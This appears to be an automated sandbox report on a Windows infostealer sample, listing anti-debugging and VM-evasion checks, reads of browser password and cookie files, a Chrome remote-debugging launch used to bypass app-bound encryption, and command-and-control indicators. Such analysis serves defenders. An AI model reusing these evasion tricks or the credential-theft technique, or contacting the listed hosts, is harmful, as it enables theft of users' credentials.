Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778140F second address: 7781485 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+20h], eax 0x0000000c jmp 00007F4970D67E8Eh 0x00000011 mov eax, dword ptr [esi+24h] 0x00000014 jmp 00007F4970D67E90h 0x00000019 mov dword ptr [edx+24h], eax 0x0000001c jmp 00007F4970D67E90h 0x00000021 mov eax, dword ptr [esi+28h] 0x00000024 pushad 0x00000025 mov edx, eax 0x00000027 mov dx, cx 0x0000002a popad 0x0000002b mov dword ptr [edx+28h], eax 0x0000002e jmp 00007F4970D67E94h 0x00000033 mov ecx, dword ptr [esi+2Ch] 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781485 second address: 7781489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781489 second address: 77814A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77814A6 second address: 7781519 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+2Ch], ecx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4970E062CCh 0x00000013 sbb ch, 00000038h 0x00000016 jmp 00007F4970E062CBh 0x0000001b popfd 0x0000001c call 00007F4970E062D8h 0x00000021 jmp 00007F4970E062D2h 0x00000026 pop eax 0x00000027 popad 0x00000028 mov ax, word ptr [esi+30h] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F4970E062CCh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781519 second address: 7781543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+30h], ax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4970D67E95h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781543 second address: 7781549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 7781549 second address: 778158A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [esi+32h] 0x0000000c pushad 0x0000000d mov edi, 07D06488h 0x00000012 jmp 00007F4970D67E91h 0x00000017 popad 0x00000018 mov word ptr [edx+32h], ax 0x0000001c jmp 00007F4970D67E8Eh 0x00000021 mov eax, dword ptr [esi+34h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov esi, ebx 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 778158A second address: 77815AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+34h], eax 0x0000000c pushad 0x0000000d mov ecx, 02BF9D1Dh 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77815AE second address: 77815C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 test ecx, 00000700h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop ecx 0x00000011 mov ax, bx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77815C3 second address: 77815E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F49E0844402h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77815E6 second address: 77815EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 77815EE second address: 7781659 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4970E062CBh 0x00000008 xor cx, E99Eh 0x0000000d jmp 00007F4970E062D9h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 or dword ptr [edx+38h], FFFFFFFFh 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov ax, bx 0x00000020 pushfd 0x00000021 jmp 00007F4970E062CFh 0x00000026 and eax, 701FB3AEh 0x0000002c jmp 00007F4970E062D9h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe

Special instruction interceptor: First address: 132191B instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Window / User API: threadDelayed 1194	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Window / User API: threadDelayed 1222	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Window / User API: threadDelayed 1204	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Window / User API: threadDelayed 1926	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Window / User API: threadDelayed 8073	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

API coverage: 1.2 %

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe TID: 5440	Thread sleep time: -52026s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe TID: 3696	Thread sleep count: 1194 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe TID: 3696	Thread sleep time: -2389194s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe TID: 4432	Thread sleep count: 1222 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe TID: 4432	Thread sleep time: -2445222s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe TID: 4836	Thread sleep count: 1204 > 30	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe TID: 4836	Thread sleep time: -2409204s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5572	Thread sleep count: 1926 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5572	Thread sleep time: -192600s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5572	Thread sleep count: 8073 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 5572	Thread sleep time: -807300s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\.ms-ad\	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\Local\Google\	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\	Jump to behavior

Source: Amcache.hve.20.dr	Binary or memory string: VMware
Source: Amcache.hve.20.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.20.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.20.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.20.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.20.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.20.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.20.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.20.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.20.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.20.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.20.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.20.dr	Binary or memory string: vmci.sys
Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.20.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.20.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.20.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.20.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.20.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.20.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.20.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.20.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.20.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.20.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.20.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.20.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.20.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.20.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: chrome.exe, 0000000A.00000002.1710263353.0000020F7E5FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy<
Source: Amcache.hve.20.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: SwJD3kiOwV.exe, 00000002.00000003.1327959481.0000000007011000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlM!t-
Source: Amcache.hve.20.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: NTICE
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: SICE
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 15_2_001C8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

15_2_001C8230

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_001C116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	15_2_001C116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_001C1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	15_2_001C1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_001C11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	15_2_001C11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 15_2_001C13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	15_2_001C13C9

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 15_2_6CA484D0 cpuid

15_2_6CA484D0

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: procmon.exe
Source: Amcache.hve.20.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.20.dr	Binary or memory string: msmpeng.exe
Source: SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: wireshark.exe
Source: Amcache.hve.20.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.20.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.20.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 15.2.service123.exe.6c9c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: service123.exe PID: 5576, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: dump.pcap, type: PCAP

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.7:49700 -> 194.87.47.113:80

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\Desktop\SwJD3kiOwV.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"

Yara detected Cryptbot

Source: Yara match

File source: dump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Process Injection	1 Masquerading	1 OS Credential Dumping	741 Security Software Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	24 Virtualization/Sandbox Evasion	LSASS Memory	24 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Data from Local System	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Process Injection	Security Account Manager	11 Process Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Extra Window Memory Injection	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	234 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Extra Window Memory Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SwJD3kiOwV.exe	51%	Virustotal		Browse
SwJD3kiOwV.exe	63%	ReversingLabs	Win32.Trojan.Amadey
SwJD3kiOwV.exe	100%	Avira	TR/Crypt.TPM.Gen
SwJD3kiOwV.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://anglebug.com/68763	0%	Avira URL Cloud	safe
http://anglebug.com/3452)	0%	Avira URL Cloud	safe
https://anglebug.com/73697	0%	Avira URL Cloud	safe
http://anglebug.com/35025	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.google.com	172.217.19.228	true	false	high
home.twentytk20pn.top	194.87.47.113	true	false	high
twentytk20pn.top	194.87.47.113	true	false	high
httpbin.org	98.85.100.80	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://twentytk20pn.top/v1/upload.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gcc.gnu.org/bugs/):	ehoYPkfWhVokJMBQaExv.dll.2.dr	false		high
https://mail.google.com/mail/?usp=installed_webapp	chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	chrome.exe, 0000000A.00000002.1720281101.000077D402E28000.00000004.00000800.00020000.00000000.sdmp	false		high
https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing	chrome.exe, 0000000A.00000002.1714682334.000077D4022D4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3452)	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.google.com/presentation/u/0/create?usp=chrome_actionsw	chrome.exe, 0000000A.00000002.1716783630.000077D402708000.00000004.00000800.00020000.00000000.sdmp	false		high
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b	chrome.exe, 0000000A.00000002.1717882214.000077D40297C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/J	chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone	chrome.exe, 0000000A.00000002.1717587909.000077D4028FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717955813.000077D4029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716640277.000077D4026B4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4633	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7382	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/284462263	chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly	chrome.exe, 0000000A.00000002.1717955813.000077D4029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718020308.000077D4029D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1720780216.000077D402F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716708558.000077D4026D8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/AUTHORS.txt	chrome.exe, 0000000A.00000003.1695928537.000077D4032D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697390107.000077D403380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696971124.000077D40320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696022186.000077D4032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1721454553.000077D402F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696270052.000077D403300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696051656.000077D403334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697530555.000077D403458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697244740.000077D4025AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696905806.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696839708.000077D402F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696874529.000077D403124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716038275.000077D4024FF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696076889.000077D4031C0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/:	chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	false		high
